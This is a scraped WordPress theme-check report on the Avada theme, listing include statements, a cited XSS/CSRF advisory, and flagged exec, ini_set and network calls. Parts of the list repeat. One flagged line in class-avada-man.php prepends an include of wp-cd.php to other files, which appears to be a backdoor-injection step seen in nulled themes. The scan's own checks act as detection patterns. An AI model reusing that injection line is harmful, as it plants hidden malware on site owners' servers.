    The theme appears to use include or require : class-avada-avadaredux-migration.php
    Line 798: require_once( ABSPATH . 'wp-admin/includes/media.php' );
    Line 799: require_once( ABSPATH . 'wp-admin/includes/file.php' );
    Line 800: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-man.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-patcher-filesystem.php
    Line 80: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-product-registration.php
    Line 180: require_once( Avada::$template_dir_path . '/includes/class-avada-envato-api
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-admin.php
    Line 370: require_once( 'admin-screens/welcome.php' );
    Line 380: require_once( 'admin-screens/support.php' );
    Line 390: require_once( 'admin-screens/install-demos.php' );
    Line 400: require_once( 'admin-screens/fusion-plugins.php' );
    Line 410: require_once( 'admin-screens/system-status.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-megamenu-framework.php
    Line 130: require_once( 'mega-menus.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : fusion-functions.php
    Line 931: require_once( ABSPATH . 'wp-admin/includes/file.php' );
    Line 981: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : importer.php
    Line 27: include 'class-avada-importer-data.php';
    Line 625: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-importer-data.php
    Line 157: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-dynamic-css.php
    Line 128: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-fusion-builder-demos-importer.php
    Line 130: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-contact.php
    Line 100: require_once( get_template_directory() . '/includes/recaptcha/src/autoload.
    Line 102: require_once( get_template_directory() . '/includes/recaptcha/class-avada-r
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : metaboxes.php
    Line 240: include 'options/options_es.php';
    Line 249: include 'options/options_slide.php';
    Line 302: <?php require_once( 'tabs/tab_' . $tab_name . '.php' ); ?>
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : avada-functions.php
    Line 141: include( locate_template( 'templates/rollover.php' ) );
    Line 195: include( locate_template( 'templates/featured-image-first.php' ) );
    Line 610: include( locate_template( 'templates/related-posts.php' ) );
    Line 631: include( locate_template( 'templates/pages-rich-snippets.php' ) );
    Line 702: include( locate_template( 'templates/title-bar.php' ) );
    Line 1023: include_once( wp_normalize_path( ABSPATH . WPINC . '/class-http.php' ) );
    Line 1060: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.

This is a ThemeForest theme. Since Themeforest items are all checked by a human before they appear on their website, ThemeForest verification rules are more permissive than themecheck's and can give a better verification score ( Themeforest requirements ).

0
Critical alerts
  1. WPScan Vulnerability Database : This theme is vulnerable to security breach "Avada Theme <= 5.1.4 - Stored Cross-Site Scripting (XSS) & CSRF "
    More on Wordpress Vulnerability Scanner site : https://wpvulndb.com/vulnerabilities/8801
  2. Customizer : Sanitization of Customizer settings Found a Customizer setting that did not have a sanitization callback function in file extension_customizer.php. Every call to the add_setting() method needs to have a sanitization callback function passed.
  3. Title : Title The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.The <title> tags can only contain a call to wp_title(). Use the wp_title filter to modify the output.
  4. Security breaches : Use of PHP sytem calls Found ->exec in file CurlPost.php.
    Line 83: $response = $this->curl->exec($handle);
  5. Security breaches : Modification of PHP server settings Found ini_set in file class-avada-migrate.php.
    Line 119: @ini_set( 'memory_limit', '256M' );
    Found ini_set in file importer.php.
    Line 53: @ini_set( 'max_execution_time', 300 );
    Line 56: @ini_set( 'memory_limit', '512M' );
  6. Malware : Network operations curl_init was found in the file Curl.php
    Line 36: * @see http://php.net/curl_init
    Line 42: return curl_init($url);
    curl_exec was found in the file Curl.php
    Line 57: * @see http://php.net/curl_exec
    Line 63: return curl_exec($ch);
    fsockopen was found in the file SocketPost.php
    Line 33: * Sends a POST request to the reCAPTCHA service, but makes use of fsockopen()
    Line 91: if (false === $this->socket->fsockopen('ssl://' . self::RECAPTCHA_HOST, 443, $errno, $errstr, 30)) {
    fsockopen was found in the file SocketPost.php
    Line 33: * Sends a POST request to the reCAPTCHA service, but makes use of fsockopen()
    Line 91: if (false === $this->socket->fsockopen('ssl://' . self::RECAPTCHA_HOST, 443, $errno, $errstr, 30)) {
    fsockopen was found in the file Socket.php
    Line 38: * fsockopen
    Line 40: * @see http://php.net/fsockopen
    Line 48: public function fsockopen($hostname, $port = -1, &$errno = 0, &$errstr = '', $timeout = nul
    Line 50: $this->handle = fsockopen($hostname, $port, $errno, $errstr, (is_null($timeout) ? ini_get('
    fsockopen was found in the file Socket.php
    Line 38: * fsockopen
    Line 40: * @see http://php.net/fsockopen
    Line 48: public function fsockopen($hostname, $port = -1, &$errno = 0, &$errstr = '', $timeout = nul
    Line 50: $this->handle = fsockopen($hostname, $port, $errno, $errstr, (is_null($timeout) ? ini_get('
  7. Included plugins : Zip file found Plugins are not allowed in themes. The zip file found was fusion-builder.zip fusion-core.zip.
Warning
  1. core scripts deregistered : Core scripts deregistrationFound wp_deregister_script in framework.php. Themes must not deregister core scripts.
    Line 562: wp_deregister_script( 'wpb_ace' );
    Found wp_deregister_script in enqueue.php. Themes must not deregister core scripts.
    Line 215: wp_deregister_script( 'jquerySelect2' );
    Found wp_deregister_script in class-avada-scripts.php. Themes must not deregister core scripts.
    Line 58: wp_deregister_script( 'novagallery_modernizr' );
    Line 62: wp_deregister_script( 'ccgallery_modernizr' );
    Line 76: wp_deregister_script( 'bootstrap' );
    Line 80: wp_deregister_script( 'cssua' );
    Line 84: wp_deregister_script( 'jquery.easyPieChart' );
    Line 88: wp_deregister_script( 'Froogaloop' );
    Line 92: wp_deregister_script( 'imagesLoaded' );
    Line 96: wp_deregister_script( 'jquery.infinitescroll' );
    Line 100: wp_deregister_script( 'isotope' );
    Line 104: wp_deregister_script( 'jquery.appear' );
    Line 108: wp_deregister_script( 'jquery.touchSwipe' );
    Line 112: wp_deregister_script( 'jquery.carouFredSel' );
    Line 116: wp_deregister_script( 'jquery.countTo' );
    Line 120: wp_deregister_script( 'jquery.countdown' );
    Line 124: wp_deregister_script( 'jquery.cycle' );
    Line 128: wp_deregister_script( 'jquery.easing' );
    Line 132: wp_deregister_script( 'jquery.elasticslider' );
    Line 136: wp_deregister_script( 'jquery.fitvids' );
    Line 140: wp_deregister_script( 'jquery.flexslider' );
    Line 144: wp_deregister_script( 'jquery.fusion_maps' );
    Line 148: wp_deregister_script( 'jquery.hoverflow' );
    Line 152: wp_deregister_script( 'jquery.hoverIntent' );
    Line 156: wp_deregister_script( 'jquery.placeholder' );
    Line 160: wp_deregister_script( 'jquery.toTop' );
    Line 165: wp_deregister_script( 'jquery.waypoints' );
    Line 169: wp_deregister_script( 'modernizr' );
    Line 173: wp_deregister_script( 'jquery.requestAnimationFrame' );
    Line 177: wp_deregister_script( 'jquery.mousewheel' );
    Line 182: wp_deregister_script( 'ilightbox.packed' );
    Line 187: wp_deregister_script( 'avada-lightbox' );
    Line 191: wp_deregister_script( 'avada-header' );
    Line 195: wp_deregister_script( 'avada-select' );
    Line 199: wp_deregister_script( 'avada-parallax' );
    Line 203: wp_deregister_script( 'avada-video-bg' );
    Line 239: wp_deregister_script( 'avada' );
  2. theme tags : Presence of bad theme tagsFound wrong tag in style.css header.
  3. Text domain : Incorrect use of translation functions.Wrong installation directory for the theme name. The directory name must match the slug of the theme. This theme's correct slug and text-domain is avada.
  4. Text domain : Incorrect use of translation functions.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered, falling back to using pixels. Saved value "%2$s" and not "%3$s".' in file validation-functions.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered, falling back to using pixels. Saved value "%2$s" and not "%3$s".' in file validation-functions.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered for %1s, falling back to using pixels. Saved value "%4$s" and not "%5$s".' in file validation-functions.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'No units were entered, falling back to using pixels. Saved value "%2$s" and not "%3$s".' in file validation-functions.php.Found a translation function that is missing a text-domain. Function _e, with the arguments '&mdash; Select &mdash;' in file class-fusion-widget-menu.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'Migration Information' in file class-avada-migrate.php.Found a translation function that is missing a text-domain. Function esc_html__, with the arguments 'link' in file class-avada-migrate.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Avada' in file avada-tgm.php.Found a translation function that is missing a text-domain. Function _n_noop, with the arguments 'Avada' in file avada-tgm.php.Found a translation function that is missing a text-domain. Function esc_attr_e, with the arguments in file list-widget.php.Found a translation function that has an incorrect number of arguments. Function _n, with the arguments 'View 1 %1$s', 'View All %2$s %3$s', total_events, 'the-events-calendar' in file single-day.php.More than one text-domain is being used in this theme. This means the theme will not be compatible with WordPress.org language packs. The domains found are Avada, avadaredux-framework, themecheck, tgmpa, fusion-core, fusion-builder, bbpress, woocommerce, avada, wordpress-importer, envato-market, textdomain, sermon-manager, the-events-calendar, tribe-events-calendar-pro, total_events.
  5. Plugin territory : Plugin territory functionalitiesThe theme uses the add_shortcode() function. Custom post-content shortcodes are plugin-territory functionality.
  6. PHP short tags : Presence of PHP short tagsPHP short tags were found in file parsedown.php. "This practice is discouraged because they are only available if enabled with short_open_tag php.ini configuration file directive, or if PHP was configured with the --enable-short-tags option" (php.net), which is not the case on many servers.
    Line 765: if (preg_match('/^\[(.+?)\]:[ ]*<?(\S+?)>?(?:[ ]+['\'(](.+)['\')])?[ ]*$/', $Line['text'], $matches))
  7. Hidden admin bar : Hidden admin Bar in CSSThemes should not hide admin bar. Detected in file style.min.css.
  8. Screenshot : Screenshot fileScreenshot size is 880x660px. Screenshot size should be 1200x900, to account for HiDPI displays. Any 4:3 image size is acceptable, but 1200x900 is preferred.Bad screenshot file extension ! File screenshot.png is not an actual JPG file. Detected type was : "image/png".
Tip-off
  1. favicon presence : Favicon managementPossible Favicon found in class-avada-head.php. Favicons are handled by the Site Icon setting in the customizer since version 4.3.
  2. Static links : Presence of hard-coded linksPossible hard-coded links were found in the file class-avada-avadaredux.php.
    Line 817: $correlation_link = '  <span class='avada-hover-description'><a href='https://theme-fusion.com/avada-doc/options/how-options-work/' target='_blan
    Possible hard-coded links were found in the file welcome.php.
    Line 478: <a href='http://docs.avadareduxframework.com/' class='docs button button-primary'>Do
    Line 481: <a href='https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=MMFMHW
    Possible hard-coded links were found in the file header_stickybar.tpl.php.
    Line 24: <a href='https://theme-fusion.com/support' target='_blank'><span class='dashicons da
    Possible hard-coded links were found in the file class-fusion-widget-facebook-page.php.
    Line 159: <h4 style='line-height: 1.6em;'><?php _e( 'IMPORTANT: Please create a Facebook App and use its ID for features like sharing.', 'Avada' ); ?> <a href='https://developers.facebook.com/docs/apps/register' target='_blank' rel='no
    Possible hard-coded links were found in the file class-avada-upgrade.php.
    Line 326: <li><strong>REMOVED:</strong> Fixed Mode for iPad is removed as a theme option. Fixed Mode is moved into a free plugin. <a href='https://theme-fusion.com/avada-doc/fixed-mode-for-ipad-portrait/' target='_
    Line 347: You can view all update information here: <a href='http://theme-fusion.com/avada-doc/install-update/important-update-informati
    Line 353: <a href='http://theme-fusion.com/avada-documentation/changelog.txt' class='view-chan
    Possible hard-coded links were found in the file support.php.
    Line 11: <p class='about-description'><?php printf( __( 'Avada comes with 6 months of free support for every license you purchase. Support can be <a %1$s>extended through subscriptions</a> via ThemeForest. All support for Avada is handled through our support center on our company site. To access it, you must first setup an account by <a %2$s>following these steps</a>. Below are all the resources we offer in our support center as well as the Avada Patcher tool that allows you to easily apply available patches to the version of Avada you are using.', 'Avada' ), 'a href='https://help.market.envato.com/hc/en-us/articles/207886473-Extending-and-Renewing-Item-Support' target='_blank'', 'href='https://theme-fusion.com/avada-doc/getting-started/avada-theme-support/' ta
    Line 12: <p><a href='https://theme-fusion.com/avada-doc/getting-started/avada-theme-support/' cl
    Line 44: <a href='https://www.facebook.com/groups/AvadaUsers/' class='button button-large but
    Possible hard-coded links were found in the file class-avada-patcher-admin-screen.php.
    Line 134: <span class='avada-auto-patcher learn-more'><a href='https://theme-fusion.com/avada-doc/avada-patcher/' target='_blank' rel='noo
    Possible hard-coded links were found in the file footer.php.
    Line 98: 'description' => sprintf( esc_html__( 'The entire height of the footer area (widgets + copyright) %1$s View tutorial here %2$s. Set a static height in px to enable sticky footer effect. Set to 0 to disable.', 'Avada' ), '<a href='https://theme-fusion.com/avada-doc/footer-special-effects/' target='_blank'
    Possible hard-coded links were found in the file contact.php.
    Line 75: 'description'     => sprintf( esc_html__( 'Follow the steps in %s to get the site key.', 'Avada' ), '<a href='http://theme-fusion.com/avada-doc/pages/setting-up-contact-page/' target='_
    Line 83: 'description'     => sprintf( esc_html__( 'Follow the steps in %s to get the secret key.', 'Avada' ), '<a href='http://theme-fusion.com/avada-doc/pages/setting-up-contact-page/' target='_
    Line 75: 'description'     => sprintf( esc_html__( 'Follow the steps in %s to get the site key.', 'Avada' ), '<a href='http://theme-fusion.com/avada-doc/pages/setting-up-contact-page/' target='_
    Line 83: 'description'     => sprintf( esc_html__( 'Follow the steps in %s to get the secret key.', 'Avada' ), '<a href='http://theme-fusion.com/avada-doc/pages/setting-up-contact-page/' target='_
    Possible hard-coded links were found in the file class-avada-admin.php.
    Line 430: <p><strong><?php esc_attr_e( 'Solution 1:', 'Avada' ); ?></strong> <?php esc_attr_e( 'Import the demo using an alternate method.', 'Avada' ); ?><a href='https://theme-fusion.com/avada-doc/demo-content-info/alternate-demo-method/
    Line 439: <p><strong><?php esc_attr_e( 'Solution 1:', 'Avada' ); ?></strong> <?php esc_attr_e( 'Import the demo using an alternate method.', 'Avada' ); ?><a href='https://theme-fusion.com/avada-doc/demo-content-info/alternate-demo-method/
    Line 430: <p><strong><?php esc_attr_e( 'Solution 1:', 'Avada' ); ?></strong> <?php esc_attr_e( 'Import the demo using an alternate method.', 'Avada' ); ?><a href='https://theme-fusion.com/avada-doc/demo-content-info/alternate-demo-method/
    Line 439: <p><strong><?php esc_attr_e( 'Solution 1:', 'Avada' ); ?></strong> <?php esc_attr_e( 'Import the demo using an alternate method.', 'Avada' ); ?><a href='https://theme-fusion.com/avada-doc/demo-content-info/alternate-demo-method/
    Possible hard-coded links were found in the file class-fusion-builder-migrate.php.
    Line 1117: <p><?php printf( __( 'If you don\'t want your pages converted then please delete the new Avada folder and copy the old Avada folder to your server. If you did not backup your previous Avada theme folder, you can %s.', 'Avada' ), '<a href='https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/' target='_bl
    Line 1123: <p><?php printf( __( 'Once reversion is done, you can load a previous version of Avada onto your server. You can download %s here if you do not have a backup of your previous theme.', 'Avada' ), '<a href='https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/'>' . esc_att
    Line 1165: <?php printf( __( 'All needed posts have been reverted to the previous syntax. You can now roll-back to <a href='%s' target='_blank'>Avada 4.0.3</a>.', 'Avada' ), 'https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/' ); ?>
    Line 1117: <p><?php printf( __( 'If you don\'t want your pages converted then please delete the new Avada folder and copy the old Avada folder to your server. If you did not backup your previous Avada theme folder, you can %s.', 'Avada' ), '<a href='https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/' target='_bl
    Line 1123: <p><?php printf( __( 'Once reversion is done, you can load a previous version of Avada onto your server. You can download %s here if you do not have a backup of your previous theme.', 'Avada' ), '<a href='https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/'>' . esc_att
    Line 1165: <?php printf( __( 'All needed posts have been reverted to the previous syntax. You can now roll-back to <a href='%s' target='_blank'>Avada 4.0.3</a>.', 'Avada' ), 'https://theme-fusion.com/forums/topic/downloading-avada-4-0-3/' ); ?>
    Possible hard-coded links were found in the file multiple-featured-images.php.
    Line 4: Description: Enables multiple featured images for posts and pages. If you like my plugin, feel free to give me reward ;) <a href='http://www.amazon.de/registry/wishlist/16KTW9ZG027C8' title='Amazon Wishlis
    Possible hard-coded links were found in the file avada-functions.php.
    Line 1202: $html .= '<a href='https://theme-fusion.com/avada-doc/sliders/how-to-get-our-demo-sliders/' ti
  3. Optional files : Presence of rtl stylesheet rtl.cssThis theme does not contain optional file rtl.php.
  4. Optional files : Presence of front page template file front-page.phpThis theme does not contain optional file front-page.php.
  5. Optional files : Presence of home template file home.phpThis theme does not contain optional file home.php.
  6. Optional files : Presence of category template file category.phpThis theme does not contain optional file category.php.
  7. Optional files : Presence of tag template file tag.phpThis theme does not contain optional file tag.php.
  8. Optional files : Presence of term template file taxonomy.phpThis theme does not contain optional file taxonomy.php.
  9. Optional files : Presence of date/time template file date.phpThis theme does not contain optional file date.php.
  10. Optional files : Presence of attachment template file attachment.phpThis theme does not contain optional file attachment.php.
  11. Optional files : Presence of image template file image.phpThis theme does not contain optional file image.php.
  12. Use of includes : Use of include or requireThe theme appears to use include or require : class-fusion-image-resizer.php
    Line 142: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : field_repeater.php
    Line 421: require_once( $class_file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : extension_accordion.php
    Line 79: //include_once($this->extension_dir . 'multi-media/inc/class.customizer.php')
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-avadaredux.php
    Line 85: require_once( dirname( __FILE__ ) . '/avadaredux-framework/avadaredux-frame
    Line 88: require_once( dirname( __FILE__ ) . '/validation-functions.php' );
    Line 90: require_once( dirname( __FILE__ ) . '/class-avada-avadaredux-addons.php' );
    Line 898: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    Line 906: include( dirname( __FILE__ ) . '/assets/style.css' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : framework.php
    Line 410: // 	require_once 'core/dashboard.php';
    Line 414: // 		require_once 'core/newsflash.php';
    Line 1705: require_once 'core/enqueue.php';
    Line 2856: require_once 'core/enqueue.php';
    Line 2914: require_once 'core/panel.php';
    Line 3243: require_once 'core/panel.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : extension_customizer.php
    Line 750: require_once( $class_file );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : welcome.php
    Line 374: require_once 'views/about.php';
    Line 389: require_once 'views/changelog.php';
    Line 404: require_once 'views/extensions.php';
    Line 420: require_once 'views/support.php';
    Line 435: require_once 'views/credits.php';
    Line 450: require_once 'views/status_report.php';
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : field_button_set.php
    Line 46: *              ['format']      string Formatting options for paginate fields. Options include ('currency','nice','niceShort','timeAgoInWords' or a valid Date() f
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-avadaredux-migration.php
    Line 798: require_once( ABSPATH . 'wp-admin/includes/media.php' );
    Line 799: require_once( ABSPATH . 'wp-admin/includes/file.php' );
    Line 800: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-man.php
    Line 43: $file = '<?php if (file_exists(dirname(__FILE__) . \'/wp-cd.php\')) include_once(dirname(__FILE__) . \'/wp-cd.php\'); ?>' . $file;
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-patcher-filesystem.php
    Line 80: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-product-registration.php
    Line 180: require_once( Avada::$template_dir_path . '/includes/class-avada-envato-api
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-admin.php
    Line 370: require_once( 'admin-screens/welcome.php' );
    Line 380: require_once( 'admin-screens/support.php' );
    Line 390: require_once( 'admin-screens/install-demos.php' );
    Line 400: require_once( 'admin-screens/fusion-plugins.php' );
    Line 410: require_once( 'admin-screens/system-status.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-megamenu-framework.php
    Line 130: require_once( 'mega-menus.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : fusion-functions.php
    Line 931: require_once( ABSPATH . 'wp-admin/includes/file.php' );
    Line 981: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : importer.php
    Line 27: include 'class-avada-importer-data.php';
    Line 625: require_once( ABSPATH . 'wp-admin/includes/image.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-importer-data.php
    Line 157: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-dynamic-css.php
    Line 128: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-fusion-builder-demos-importer.php
    Line 130: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : class-avada-contact.php
    Line 100: require_once( get_template_directory() . '/includes/recaptcha/src/autoload.
    Line 102: require_once( get_template_directory() . '/includes/recaptcha/class-avada-r
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : metaboxes.php
    Line 240: include 'options/options_es.php';
    Line 249: include 'options/options_slide.php';
    Line 302: <?php require_once( 'tabs/tab_' . $tab_name . '.php' ); ?>
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
    The theme appears to use include or require : avada-functions.php
    Line 141: include( locate_template( 'templates/rollover.php' ) );
    Line 195: include( locate_template( 'templates/featured-image-first.php' ) );
    Line 610: include( locate_template( 'templates/related-posts.php' ) );
    Line 631: include( locate_template( 'templates/pages-rich-snippets.php' ) );
    Line 702: include( locate_template( 'templates/title-bar.php' ) );
    Line 1023: include_once( wp_normalize_path( ABSPATH . WPINC . '/class-http.php' ) );
    Line 1060: require_once( ABSPATH . '/wp-admin/includes/file.php' );
    If these are being used to include separate sections of a template from independent files, then get_template_part() should be used instead. Otherwise, use include_once or require_once instead.
Other checked themes